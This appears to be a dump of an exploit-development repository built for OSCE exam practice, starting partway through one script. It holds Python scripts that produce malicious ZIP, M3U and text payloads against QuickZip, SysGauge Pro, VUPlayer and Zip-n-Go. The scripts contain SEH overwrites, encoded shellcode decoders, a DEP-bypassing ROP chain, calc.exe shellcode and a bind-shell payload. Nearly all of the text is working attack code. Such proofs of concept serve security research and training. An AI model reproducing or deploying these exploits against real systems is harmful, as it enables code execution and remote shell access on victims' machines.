CDFileHeader += '\x00\x00' # disk number where file starts
CDFileHeader += '\x01\x00' # internal file attributes BIT 0: apparent ASCII/text file
CDFileHeader += '\x24\x00\x00\x00' # external file attributes
CDFileHeader += '\x00\x00\x00\x00' # relative offset of local file header
#CDFileHeader += '\x00' # file name
#CDFileHeader += '\x00' # extra field
#CDFileHeader += '\x00' # file comment
################ End of Central Directory Record ##################
EOCDRHeader = '\x50\x4b\x05\x06' # End of central directory signature
EOCDRHeader += '\x00\x00' # number of this disk
EOCDRHeader += '\x00\x00' # disk where central directory starts
EOCDRHeader += '\x01\x00' # number of central directory records on this disk
EOCDRHeader += '\x01\x00' # total number of central directory records
EOCDRHeader += '\x12\x10\x00\x00' # size of central directory (4114 bytes)
EOCDRHeader += '\x02\x10\x00\x00' # offset of start of central directory, relative to start of archive
EOCDRHeader += '\x00\x00' # comment length
#EOCDRHeader += '\x00' # comment
Evil = '\x41' * 294
Evil += '\x75\x06\x74\x06' # nSEH JZ & JNZ (aka jump net)
Evil += '\x3d\x1b\x7e\x6d' # SEH pop esi,pop ebx, retn in D3DXOF.dll (OS module - WinXP SP3)
Evil += '\x41\x41' # compensate for short jump
Evil += '\x54' # PUSH ESP * save stack pointer to edi
Evil += '\x5F' # POP EDI
Evil += '\x54' # PUSH ESP * point esp to where we want to decode otherwise bad shellcode
Evil += '\x58' # POP EAX
Evil += '\x05\x24\x13\x11\x11' # ADD EAX,11111324
Evil += '\x05\x25\x16\x11\x11' # ADD EAX,11111625
Evil += '\x2D\x21\x22\x22\x22' # SUB EAX,22222221
Evil += '\x50' # PUSH EAX
Evil += '\x5C' # POP ESP * mov eax to esp
#root@kali:/opt/Slink# python Slink.py * decode the following
#Enter your shellcode: 89FC89F8054E070000FFE0 mov esp,edi restore stack pointer
#[!] Shellcode size is not divisible by 4 mov eax,edi use edi as an relative address
#[+] Padding shellcode with 1 NOPS.. add eax,0x74e align eax to the start oh shellcode
#[+] Encoding [90e0ff00].. jmp eax jump to shellcode
#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
Evil += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
Evil += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
Evil += "\x05\x11\x77\x61\x41" ## add eax, 0x41617711
Evil += "\x05\x11\x66\x51\x41" ## add eax, 0x41516611
Evil += "\x05\x11\x55\x61\x41" ## add eax, 0x41615511
Evil += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
Evil += "\x50" ## push eax
#[+] Encoding [00074e05]..
#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
Evil += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
Evil += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
Evil += "\x05\x13\x36\x13\x11" ## add eax, 0x11133613
Evil += "\x05\x13\x25\x13\x11" ## add eax, 0x11132513
Evil += "\x05\x12\x26\x13\x11" ## add eax, 0x11132612
Evil += "\x2D\x33\x33\x32\x33" ## sub eax, 0x33323333
Evil += "\x50" ## push eax
#[+] Encoding [f889fc89]..
#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
Evil += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
Evil += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
Evil += "\x05\x44\x76\x44\x74" ## add eax, 0x74447644
Evil += "\x05\x44\x65\x44\x64" ## add eax, 0x64446544
Evil += "\x05\x34\x54\x34\x53" ## add eax, 0x53345434
Evil += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
Evil += "\x50" ## push eax
Evil += '\x42' * (250-116)
Evil += shellcode
Evil += '\x41' * (4064-294-4-4-250-len(shellcode))
Evil += '.txt'
buffer = LocalFileHeader
buffer += Evil
buffer += CDFileHeader
buffer += Evil
buffer += EOCDRHeader
try:
f=open("Evil.zip","w")
print "[+] Creating %s bytes evil payload.." %len(Evil)
f.write(buffer)
f.close()
print "[+] File created!"
except Exception as e:
print e
================================================
FILE: Local Buffer Overflow/QuickZipv4.60.019/README.md
================================================
### Quick Zip v4.60.019
Local SEH overwrite with restricted characters set. I thought this exploit was quite challenging yet fun!
<p align="center">
<img src="https://github.com/ihack4falafel/OSCE/blob/master/Local%20Buffer%20Overflow/QuickZipv4.60.019/PoC.gif">
</p>
================================================
FILE: Local Buffer Overflow/SysGaugeProv4.6.12/Exploit.py
================================================
#!/usr/bin/python
##################################################################################################################
# Exploit Title : SysGauge Pro v4.6.12 - Local Buffer Overflow (SEH) #
# Exploit Author : Hashim Jawad #
# Twitter : @ihack4falafel #
# Author Website : ihack4falafel[.]com #
# Vendor Homepage : http://www.sysgauge.com/ #
# Vulnerable Software : http://www.sysgauge.com/setups/sysgaugepro_setup_v4.6.12.exe #
# Tested on : Windows XP Professional - SP3 #
# Steps to reproduce : ~ Copy content of payload.txt #
# ~ Under Register type in "falafel" in Customer Name field #
# ~ Paste the content of payload.txt in Unlock Key field and click Register #
##################################################################################################################
import struct
# ***notes***
# ~ this particular function [Register] of the program only accept characters [00-7f] excluding "\x00\x09\x0a\x0d"
# ~ found two application dlls [QtGui4.dll] & [libdgg.dll] that have plenty of [pop, pop, ret] with clean address
# ~ the following are Flexense products effected by the same vulnerability (note buffer size and offsets may vary)
##################################################################################################################
# ~ SysGauge Ultimate v4.6.12
# ~ Azure DEX Pro v2.2.16
# ~ Azure DEX Ultimate v2.2.16
# ~ DiskBoss Pro v9.1.16
# ~ DiskBoss Ultimate v9.1.16
# ~ SyncBreeze Pro v10.7.14
# ~ SyncBreeze Ultimate v10.7.14
# ~ DiskPulse Pro v10.7.14
# ~ DiskPulse Ultimate v10.7.14
# ~ DiskSavvy Pro v10.7.14
# ~ DiskSavvy Ultimate v10.7.14
# ~ DiskSorter Pro v10.7.14
# ~ DiskSorter Ultimate v10.7.14
# ~ DupScout Pro v10.7.14
# ~ DupScout Ultimate v10.7.14
# ~ VX Search Pro v10.7.14
# ~ VX Search Ultimate v10.7.14
##################################################################################################################
# overwrite SEH with clean address of [pop, pop, ret]
buffer = "\x41" * 780 # junk to nSEH
buffer += "\x74\x06\x42\x42" # nSEH - jump if zero flag is set (always true)
buffer += struct.pack('<L', 0x10013d16) # SEH (pop esi # pop ecx # retn | [libdgg.dll])
buffer += "\x43" * 28 # some more junk
# push calc.exe instructions [encoded] into the stack
# Disassembly:
# 0: 33 c0 xor eax,eax # zero out eax register
# 2: 50 push eax # push eax (null-byte) to terminate "calc.exe"
# 3: 68 2E 65 78 65 push ".exe" # push the ASCII string to the stack
# 8: 68 63 61 6C 63 push "calc" #
# d: 8b c4 mov eax,esp # put the pointer to the ASCII string in eax
# f: 6a 01 push 0x1 # push uCmdShow parameter to the stack
# 11: 50 push eax # push the pointer to lpCmdLine to the stack
# 12: bb 5d 2b 86 7c mov ebx,0x7c862b5d # move the pointer to WinExec() [located at 0x7c862b5d in kernel32.dll (via arwin.exe) on WinXP SP3] into ebx
# 17: ff d3 call ebx # call WinExec()
# divide calc.exe instructions to 4-byte chunks and pad what's left with nops
# "\x33\xc0\x50\x68"
# "\x2e\x65\x78\x65"
# "\x68\x63\x61\x6C"
# "\x63\x8b\xc4\x6a"
# "\x01\x50\xbb\x5d"
# "\x2b\x86\x7c\xff"
# "\xd3\x90\x90\x90"
# starting from the bottom up in little endian order
# first push "\x90\x90\x90\xd3"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x90\x90\x90\xd3" into eax and push it to the stack
buffer += "\x05\x72\x70\x70\x70" ### add eax,0x70707072
buffer += "\x05\x61\x20\x20\x20" ### add eax,0x20202061
buffer += "\x50" ### push eax
##############################################################
# second push "\xff\x7c\x86\x2b"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\xff\x7c\x86\x2b" into eax and push it to the stack
buffer += "\x05\x01\x32\x35\x66" ### add eax,0x66353201
buffer += "\x05\x15\x32\x35\x66" ### add eax,0x66353215
buffer += "\x05\x15\x22\x12\x33" ### add eax,0x33122215
buffer += "\x50" ### push eax
##############################################################
# third push "\x5d\xbb\x50\x01"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x5d\xbb\x50\x01" into eax and push it to the stack
buffer += "\x05\x01\x30\x65\x36" ### add eax,0x36653001
buffer += "\x05\x01\x20\x56\x27" ### add eax,0x27562001
buffer += "\x48" ### dec eax
buffer += "\x50" ### push eax
##############################################################
# fourth push "\x6a\xc4\x8b\x63"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x6a\xc4\x8b\x63" into eax and push it to the stack
buffer += "\x05\x32\x46\x70\x35" ### add eax,0x35544632
buffer += "\x05\x31\x43\x70\x35" ### add eax,0x35704531
buffer += "\x50" ### push eax
##############################################################
# fifth push "\x6c\x61\x63\x68"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x6c\x61\x63\x68" into eax and push it to the stack
buffer += "\x05\x34\x32\x31\x36" ### add eax,0x36313234
buffer += "\x05\x34\x31\x30\x36" ### add eax,0x36303134
buffer += "\x50" ### push eax
##############################################################
# sixth push "\x65\x78\x65\x2e"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x65\x78\x65\x2e" into eax and push it to the stack
buffer += "\x05\x17\x33\x34\x33" ### add eax,0x33343317
buffer += "\x05\x17\x32\x44\x32" ### add eax,0x32443217
buffer += "\x50" ### push eax
##############################################################
# seventh push "\x68\x50\xc0\x33"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x68\x50\xc0\x33" into eax and push it to the stack
buffer += "\x05\x22\x60\x30\x34" ### add eax,0x34306022
buffer += "\x05\x11\x60\x20\x34" ### add eax,0x34206011
buffer += "\x50" ### push eax
##############################################################
# push 20 nops to the stack for padding
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x90\x90\x90\x90" into eax and push it to the stack
buffer += "\x05\x70\x70\x70\x70" ### add eax,0x70707070
buffer += "\x05\x20\x20\x20\x20" ### add eax,0x20202020
buffer += "\x50" ### push eax
buffer += "\x50" ### push eax
buffer += "\x50" ### push eax
buffer += "\x50" ### push eax
buffer += "\x50" ### push eax
##############################################################
# push "jmp esp" address [encoded] to the stack
# 0x6709e053 : "\xff\xe4" | [QtCore4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, (C:\Program Files\SysGauge Pro\bin\QtCore4.dll)
# 0: 25 10 10 10 10 and eax,0x10101010
# 5: 25 01 01 01 01 and eax,0x1010101
# a: 05 31 70 03 34 add eax,0x34037031
# f: 05 22 70 06 33 add eax,0x33067022
# 14: 50 push eax
buffer += "\x25\x10\x10\x10\x10\x25\x01\x01\x01\x01\x05\x31\x70\x03\x34\x05\x22\x70\x06\x33\x50"
# the program converts "\xff" to "c3" [retn instruction] thus popping previously pushed to the stack address "jmp esp" to eip ;)
buffer += "\xff"
buffer += "C" * (50000-780-4-4-28-21-21-26-22-21-21-21-21-25-1) ### junk
try:
f=open("payload.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
================================================
FILE: Local Buffer Overflow/SysGaugeProv4.6.12/readme.md
================================================
### SysGauge Pro v4.6.12
Structured Exception Handler (SEH) chain overwrite exploit found during my prep to take on OSCE, had to make custom shellcode/encoder in order to bypass bad character limitations. See the link [EDB-ID: 44455](https://www.exploit-db.com/exploits/44455/)
================================================
FILE: Local Buffer Overflow/VUPlayerv2.49/Exploit.py
================================================
#!/usr/bin/env python
import struct
import time
#root@kali:~# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0a\x0d\x1a" -f python -v shellcode (227 bytes)
shellcode = ""
shellcode += "\xbb\xc7\x16\xe0\xde\xda\xcc\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
shellcode += "\x33\x83\xc0\x04\x31\x58\x0e\x03\x9f\x18\x02\x2b\xe3\xcd\x4b"
shellcode += "\xd4\x1b\x0e\x2c\x5c\xfe\x3f\x7e\x3a\x8b\x12\x4e\x48\xd9\x9e"
shellcode += "\x25\x1c\xc9\x15\x4b\x89\xfe\x9e\xe6\xef\x31\x1e\xc7\x2f\x9d"
shellcode += "\xdc\x49\xcc\xdf\x30\xaa\xed\x10\x45\xab\x2a\x4c\xa6\xf9\xe3"
shellcode += "\x1b\x15\xee\x80\x59\xa6\x0f\x47\xd6\x96\x77\xe2\x28\x62\xc2"
shellcode += "\xed\x78\xdb\x59\xa5\x60\x57\x05\x16\x91\xb4\x55\x6a\xd8\xb1"
shellcode += "\xae\x18\xdb\x13\xff\xe1\xea\x5b\xac\xdf\xc3\x51\xac\x18\xe3"
shellcode += "\x89\xdb\x52\x10\x37\xdc\xa0\x6b\xe3\x69\x35\xcb\x60\xc9\x9d"
shellcode += "\xea\xa5\x8c\x56\xe0\x02\xda\x31\xe4\x95\x0f\x4a\x10\x1d\xae"
shellcode += "\x9d\x91\x65\x95\x39\xfa\x3e\xb4\x18\xa6\x91\xc9\x7b\x0e\x4d"
shellcode += "\x6c\xf7\xbc\x9a\x16\x5a\xaa\x5d\x9a\xe0\x93\x5e\xa4\xea\xb3"
shellcode += "\x36\x95\x61\x5c\x40\x2a\xa0\x19\xbe\x60\xe9\x0b\x57\x2d\x7b"
shellcode += "\x0e\x3a\xce\x51\x4c\x43\x4d\x50\x2c\xb0\x4d\x11\x29\xfc\xc9"
shellcode += "\xc9\x43\x6d\xbc\xed\xf0\x8e\x95\x8d\x97\x1c\x75\x7c\x32\xa5"
shellcode += "\x1c\x80"
buffer = "HTTP://" + "\x41" * 1005
### ROP Chain for VirtualProtect() ###
#========================================#
### stack pivot
buffer += struct.pack('<L', 0x1003a084) # RETN (ROP NOP) [BASS.dll]
### edx = NewProtect (0x40)
buffer += struct.pack('<L', 0x10015f82) # POP EAX # RETN [BASS.dll]
buffer += struct.pack('<L', 0xffffffc0) # value to negate, will become 0x00000040
buffer += struct.pack('<L', 0x10014db4) # NEG EAX # RETN [BASS.dll]
buffer += struct.pack('<L', 0x10038a6d) # XCHG EAX,EDX # RETN [BASS.dll]
### ebx = dwSize (501)
buffer += struct.pack('<L', 0x10015f82) # POP EAX # RETN [BASS.dll]
buffer += struct.pack('<L', 0xfffffaff) # value to negate, will become 0x00000501
buffer += struct.pack('<L', 0x10014db4) # NEG EAX # RETN [BASS.dll]
buffer += struct.pack('<L', 0x10032f72) # XCHG EAX,EBX # RETN 0x00 [BASS.dll]
### eax = ptr to &VirtualProtect()
buffer += struct.pack('<L', 0x10015f82) # POP EAX # RETN [BASS.dll]
buffer += struct.pack('<L', 0x1060e25c) # ptr to &VirtualProtect() [BASSMIDI.dll]
### ecx = lpOldProtect (ptr to writeable address)
buffer += struct.pack('<L', 0x101049ec) # POP ECX # RETN [BASSWMA.dll]
buffer += struct.pack('<L', 0x101082db) # &Writable location [BASSWMA.dll]
### esp = lPAddress (automatic) aka shellcode
### ebp = pop 4 bytes
buffer += struct.pack('<L', 0x10010157) # POP EBP # RETN [BASS.dll]
buffer += struct.pack('<L', 0x10010157) # skip 4 bytes [BASS.dll]
### esi = ptr to jmp [eax]
buffer += struct.pack('<L', 0x1001d804) # POP ESI # RETN [BASS.dll]
buffer += struct.pack('<L', 0x10101c02) # JMP [EAX] [BASSWMA.dll]
### edi = ROP NOP (RETN)
buffer += struct.pack('<L', 0x100190b0) # POP EDI # RETN [BASS.dll]
buffer += struct.pack('<L', 0x1003a084) # RETN (ROP NOP) [BASS.dll]
### push register values to poor stack
buffer += struct.pack('<L', 0x1001d7a5) # PUSHAD # RETN [BASS.dll]
buffer += struct.pack('<L', 0x1010539f) # jmp esp in BASSWMA.dll universal
buffer += "\x90" * 20 # make space for shellcode decoder
buffer += shellcode # evil calc.exe
### padding
buffer += "\x43" * (20000-7-1005-(4*21)-20-len(shellcode))
try:
f=open("OpenMe.m3u","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
time.sleep(1)
f.write(buffer)
f.close()
print "[+] File created. Load that shit up!"
except:
print "File cannot be created"
================================================
FILE: Local Buffer Overflow/VUPlayerv2.49/readme.md
================================================
### VUPlayer v2.49
ROP chain exploit to pop calc.exe by bypassing DEP protection on Windows XP SP3 using Windows VirtualProtect() API.
================================================
FILE: Local Buffer Overflow/Zip-n-Gov4.9/Exploit.py
================================================
#!/usr/bin/python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title : Zip-n-Go v4.9 - Local Buffer Overflow (SEH) #
# Exploit Author : Hashim Jawad - @ihack4falafel #
# Vendor Homepage : http://mc1soft.com/index.shtml #
# Vulnerable Software: http://mc1soft.com/files/zip-n-go49old.exe #
# Tested on : Windows 7 Enterprise - SP1 (x86) #
#----------------------------------------------------------------------------------------------------------#
# Disclosure Timeline:
# ====================
# 05-28-18: Contacted vendor, no response
# 05-30-18: Contacted vendor again, responded with patch and requested further testing
# 05-30-18: Patch did not seem to fix the problem and alternative approach were suggested
# 05-31-18: Vendor applied new patch and requested further testing
# 05-31-18: The new patch nullified the vulnerability
# 06-03-18: Version 4.95 was released
# 06-03-18: Proof of concept exploit published
#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -e x86/alpha_mixed BufferRegister=EAX -f python -v shellcode
#Payload size: 710 bytes
shellcode = ""
shellcode += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
shellcode += "\x42\x75\x4a\x49\x39\x6c\x5a\x48\x6e\x62\x43\x30"
shellcode += "\x45\x50\x73\x30\x61\x70\x6d\x59\x7a\x45\x46\x51"
shellcode += "\x39\x50\x72\x44\x4e\x6b\x52\x70\x30\x30\x6c\x4b"
shellcode += "\x52\x72\x56\x6c\x6c\x4b\x73\x62\x37\x64\x4c\x4b"
shellcode += "\x32\x52\x51\x38\x54\x4f\x6f\x47\x31\x5a\x61\x36"
shellcode += "\x50\x31\x79\x6f\x4c\x6c\x35\x6c\x31\x71\x51\x6c"
shellcode += "\x47\x72\x46\x4c\x71\x30\x59\x51\x5a\x6f\x44\x4d"
shellcode += "\x56\x61\x6b\x77\x38\x62\x69\x62\x72\x72\x43\x67"
shellcode += "\x6e\x6b\x43\x62\x32\x30\x6c\x4b\x33\x7a\x55\x6c"
shellcode += "\x6c\x4b\x32\x6c\x34\x51\x34\x38\x6d\x33\x37\x38"
shellcode += "\x57\x71\x4a\x71\x66\x31\x6c\x4b\x42\x79\x51\x30"
shellcode += "\x65\x51\x59\x43\x4c\x4b\x52\x69\x45\x48\x6b\x53"
shellcode += "\x77\x4a\x47\x39\x4e\x6b\x76\x54\x4e\x6b\x46\x61"
shellcode += "\x58\x56\x36\x51\x59\x6f\x6e\x4c\x49\x51\x4a\x6f"
shellcode += "\x76\x6d\x35\x51\x68\x47\x57\x48\x49\x70\x62\x55"
shellcode += "\x48\x76\x56\x63\x31\x6d\x4a\x58\x55\x6b\x73\x4d"
shellcode += "\x35\x74\x33\x45\x4b\x54\x52\x78\x6c\x4b\x46\x38"
shellcode += "\x51\x34\x56\x61\x59\x43\x33\x56\x6c\x4b\x76\x6c"
shellcode += "\x50\x4b\x4e\x6b\x46\x38\x75\x4c\x67\x71\x68\x53"
shellcode += "\x6c\x4b\x34\x44\x4e\x6b\x47\x71\x78\x50\x4b\x39"
shellcode += "\x47\x34\x57\x54\x55\x74\x33\x6b\x33\x6b\x55\x31"
shellcode += "\x31\x49\x50\x5a\x42\x71\x4b\x4f\x4b\x50\x31\x4f"
shellcode += "\x31\x4f\x72\x7a\x4c\x4b\x54\x52\x6a\x4b\x6c\x4d"
shellcode += "\x31\x4d\x62\x48\x46\x53\x50\x32\x77\x70\x43\x30"
shellcode += "\x72\x48\x70\x77\x30\x73\x35\x62\x43\x6f\x50\x54"
shellcode += "\x70\x68\x72\x6c\x71\x67\x67\x56\x47\x77\x49\x6f"
shellcode += "\x68\x55\x6e\x58\x4c\x50\x43\x31\x45\x50\x53\x30"
shellcode += "\x46\x49\x78\x44\x33\x64\x62\x70\x50\x68\x76\x49"
shellcode += "\x4f\x70\x42\x4b\x43\x30\x69\x6f\x69\x45\x73\x5a"
shellcode += "\x67\x78\x31\x49\x42\x70\x6a\x42\x59\x6d\x71\x50"
shellcode += "\x32\x70\x73\x70\x36\x30\x70\x68\x78\x6a\x36\x6f"
shellcode += "\x69\x4f\x6d\x30\x6b\x4f\x69\x45\x4f\x67\x63\x58"
shellcode += "\x47\x72\x47\x70\x36\x71\x31\x4c\x6c\x49\x59\x76"
shellcode += "\x70\x6a\x74\x50\x31\x46\x61\x47\x45\x38\x4f\x32"
shellcode += "\x69\x4b\x54\x77\x35\x37\x79\x6f\x6a\x75\x66\x37"
shellcode += "\x51\x78\x4d\x67\x39\x79\x37\x48\x59\x6f\x39\x6f"
shellcode += "\x6a\x75\x62\x77\x61\x78\x43\x44\x68\x6c\x37\x4b"
shellcode += "\x68\x61\x69\x6f\x4a\x75\x70\x57\x5a\x37\x52\x48"
shellcode += "\x74\x35\x32\x4e\x52\x6d\x45\x31\x39\x6f\x4a\x75"
shellcode += "\x71\x78\x71\x73\x30\x6d\x32\x44\x65\x50\x4f\x79"
shellcode += "\x69\x73\x36\x37\x32\x77\x36\x37\x70\x31\x7a\x56"
shellcode += "\x51\x7a\x56\x72\x53\x69\x36\x36\x7a\x42\x49\x6d"
shellcode += "\x43\x56\x78\x47\x33\x74\x31\x34\x37\x4c\x67\x71"
shellcode += "\x46\x61\x6e\x6d\x53\x74\x34\x64\x62\x30\x6a\x66"
shellcode += "\x65\x50\x71\x54\x66\x34\x52\x70\x72\x76\x36\x36"
shellcode += "\x32\x76\x31\x56\x70\x56\x30\x4e\x53\x66\x52\x76"
shellcode += "\x31\x43\x32\x76\x52\x48\x64\x39\x38\x4c\x65\x6f"
shellcode += "\x4f\x76\x49\x6f\x78\x55\x4b\x39\x49\x70\x50\x4e"
shellcode += "\x53\x66\x31\x56\x79\x6f\x34\x70\x50\x68\x65\x58"
shellcode += "\x4e\x67\x57\x6d\x63\x50\x79\x6f\x38\x55\x4d\x6b"
shellcode += "\x68\x70\x78\x35\x6d\x72\x62\x76\x72\x48\x6d\x76"
shellcode += "\x4d\x45\x6f\x4d\x4f\x6d\x39\x6f\x4b\x65\x37\x4c"
shellcode += "\x77\x76\x71\x6c\x46\x6a\x6f\x70\x39\x6b\x4d\x30"
shellcode += "\x74\x35\x33\x35\x6f\x4b\x61\x57\x77\x63\x52\x52"
shellcode += "\x50\x6f\x32\x4a\x73\x30\x32\x73\x6b\x4f\x78\x55"
shellcode += "\x41\x41"
####################### ZIP File Structure ########################
###################################################################
######################## Local File Header ########################
LocalFileHeader = '\x50\x4b\x03\x04' # local file header signature
LocalFileHeader += '\x14\x00' # version needed to extract 0x14 = 20 -> 2.0
LocalFileHeader += '\x00\x00' # general purpose bit flag
LocalFileHeader += '\x00\x00' # compression method
LocalFileHeader += '\xb7\xac' # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23
LocalFileHeader += '\xce\x34' # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3
LocalFileHeader += '\x00\x00\x00' # CRC-32 '\x00' was left out to make sure we hit 25 bytes before file length
LocalFileHeader += '\x00\x00\x00\x00' # compressed size
LocalFileHeader += '\x00\x00\x00\x00' # uncompressed size
LocalFileHeader += '\xe4\x0f' # file name length 0x0fe4 = 4068 bytes
LocalFileHeader += '\x00\x00' # extra field length
LocalFileHeader += '\x00' # file name
#LocalFileHeader += '\x00' # extra filed
################## Central Directory File Header ##################
CDFileHeader = '\x50\x4b\x01\x02' # cd file header signature
CDFileHeader += '\x14\x00' # version made by 0x14 = 20 -> 2.0
CDFileHeader += '\x14\x00' # version needed to extract 0x14 = 20 -> 2.0
CDFileHeader += '\x00\x00' # general purpose bit flag
CDFileHeader += '\x00\x00' # compression method
CDFileHeader += '\xb7\xac' # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23
CDFileHeader += '\xce\x34' # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3
CDFileHeader += '\x00\x00\x00\x00' # CRC-32
CDFileHeader += '\x00\x00\x00\x00' # compressed size
CDFileHeader += '\x00\x00\x00\x00' # uncompressed size
CDFileHeader += '\xe4\x0f' # file name length 0x0fe4 = 4068 bytes
CDFileHeader += '\x00\x00' # extra field length
CDFileHeader += '\x00\x00' # file comment length
CDFileHeader += '\x00\x00' # disk number where file starts
CDFileHeader += '\x01\x00' # internal file attributes BIT 0: apparent ASCII/text file
CDFileHeader += '\x24\x00\x00\x00' # external file attributes
CDFileHeader += '\x00\x00\x00\x00' # relative offset of local file header
#CDFileHeader += '\x00' # file name
#CDFileHeader += '\x00' # extra field
#CDFileHeader += '\x00' # file comment
################ End of Central Directory Record ##################
EOCDRHeader = '\x50\x4b\x05\x06' # End of central directory signature
EOCDRHeader += '\x00\x00' # number of this disk
EOCDRHeader += '\x00\x00' # disk where central directory starts
EOCDRHeader += '\x01\x00' # number of central directory records on this disk
EOCDRHeader += '\x01\x00' # total number of central directory records
EOCDRHeader += '\x12\x10\x00\x00' # size of central directory 0x1012 = 4114 bytes
EOCDRHeader += '\x02\x10\x00\x00' # offset of start of central directory, relative to start of archive
EOCDRHeader += '\x00\x00' # comment length
#EOCDRHeader += '\x00' # comment
Witchcraft = '\x54' # PUSH ESP * save stack pointer
Witchcraft += '\x5F' # POP EDI
Witchcraft += '\x54' # PUSH ESP * calculate offset for decoder
Witchcraft += '\x58' # POP EAX
Witchcraft += '\x05\x11\x21\x11\x11' # ADD EAX,11112111
Witchcraft += '\x05\x11\x21\x11\x11' # ADD EAX,11112111
Witchcraft += '\x2D\x53\x25\x22\x22' # SUB EAX,22222553
Witchcraft += '\x50' # PUSH EAX
Witchcraft += '\x5C' # POP ESP
#https://github.com/ihack4falafel/Slink
#root@kali:/opt/Slink# python Slink.py * decode the following 'nop;mov esp, edi;mov eax, edi;add eax, 58c;jmp eax'
#Enter your shellcode: 9089FC89F8058C050000FFE0
#[+] Shellcode size is divisible by 4
#[+] Encoding [e0ff0000]..
#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
Witchcraft += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
Witchcraft += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
Witchcraft += "\x05\x11\x11\x77\x61" ## add eax, 0x61771111
Witchcraft += "\x05\x11\x11\x66\x51" ## add eax, 0x51661111
Witchcraft += "\x05\x11\x11\x55\x61" ## add eax, 0x61551111
Witchcraft += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
Witchcraft += "\x50" ## push eax
#[+] Encoding [058c05f8]..
#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
Witchcraft += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
Witchcraft += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
Witchcraft += "\x05\x74\x13\x46\x13" ## add eax, 0x13461374
Witchcraft += "\x05\x64\x13\x45\x13" ## add eax, 0x13451364
Witchcraft += "\x05\x53\x12\x34\x12" ## add eax, 0x12341253
Witchcraft += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
Witchcraft += "\x50" ## push eax
#[+] Encoding [89fc8990]..
#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
Witchcraft += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
Witchcraft += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
Witchcraft += "\x05\x41\x44\x76\x44" ## add eax, 0x44764441
Witchcraft += "\x05\x41\x44\x65\x44" ## add eax, 0x44654441
Witchcraft += "\x05\x41\x34\x54\x34" ## add eax, 0x34543441
Witchcraft += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
Witchcraft += "\x50" ## push eax
Evil = '\x41' * 3066 # offset to shellcode
Evil += shellcode # bind shell
Evil += '\x43' * (716-len(shellcode)) # shellcode host
Evil += Witchcraft # magic!
Evil += '\x42' * (126-len(Witchcraft)) # witchcraft host
Evil += '\x74\x80\x75\x80' # nSEH - short jump backward (jump net)
Evil += '\x6e\x4c\x40\x00' # SEH - pop ecx, pop ebp, retn in zip-n-go.exe
Evil += '\x41' * (4064-3908-4-4)
Evil += '.txt'
buffer = LocalFileHeader
buffer += Evil
buffer += CDFileHeader
buffer += Evil
buffer += EOCDRHeader
try:
f=open("Evil.zip","w")
print "[+] Creating %s bytes evil payload.." %len(Evil)
f.write(buffer)
f.close()
print "[+] File created!"
except Exception as e:
print e
================================================
FILE: Local Buffer Overflow/Zip-n-Gov4.9/README.md
================================================
### Zip-n-Go v4.9
